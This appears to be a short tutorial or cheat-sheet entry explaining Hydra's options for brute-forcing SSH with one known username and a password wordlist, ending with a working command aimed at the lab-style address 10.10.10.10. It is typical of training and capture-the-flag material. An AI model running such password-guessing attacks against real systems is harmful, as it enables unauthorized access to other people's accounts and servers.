Brute force SSH with one user and a wordlist
The classic form: -l for a known username, -P for a password file, then service://host. Hydra tries every password in the list against that user. Here 'admin' has a weak password waiting in rockyou-mini.txt.
hydra -l admin -P rockyou-mini.txt ssh://10.10.10.10